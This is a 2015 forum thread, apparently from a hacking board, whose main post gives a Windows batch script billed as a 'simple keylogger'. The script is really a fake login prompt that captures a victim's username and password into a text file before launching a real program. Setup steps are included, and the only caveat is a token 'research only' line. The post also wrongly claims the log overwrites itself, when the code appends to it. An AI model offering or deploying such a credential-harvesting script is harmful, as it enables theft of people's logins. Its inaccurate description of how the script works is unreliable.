2015-07-19 at 3:38 AM UTC
in
Simple Keylogger With Notepad
The following users say it would be alright if the author of this
post didn't die in a fire!
2015-07-19 at 2:58 AM UTC
in
Simple Keylogger With Notepad
If you change the word after C:in line 8 to something different, can you name the folder on your desktop that same name?
forgive the dumb question, I suck at computers.
The following users say it would be alright if the author of this
post didn't die in a fire!
2015-07-15 at 1:01 AM UTC
in
Simple Keylogger With Notepad
The following is to be used for research purposes only, and I take no responsibility for anything done with malicious intent.
Alright, we're just going to use Notepad to make a simple .bat (Batch) file, keylogger.
Start by opening Notepad, then pasting in the following code:
@echo off
color a
title Login
cls
echo Please Enter Email Adress And Password
echo.
echo.
cd "C:\Logs"
set /p user=Username:
set /p pass=Password:
echo Username="%user%" Password="%pass%" >> Log.txt
start >>Program Here<<
exit
Make a folder on your desktop called "Logs". It must be logs or it will not work.
Drag that folder into C:\
Now run a test of your "Logger.bat".
Once tested, go back to the "Logs" folder in C:\ and there will be a .txt file. If a second entry is made, the .txt will overwrite itself.
Enjoy!
The following users say it would be alright if the author of this
post didn't die in a fire!
The following users say it would be alright if the author of this
post didn't die in a fire!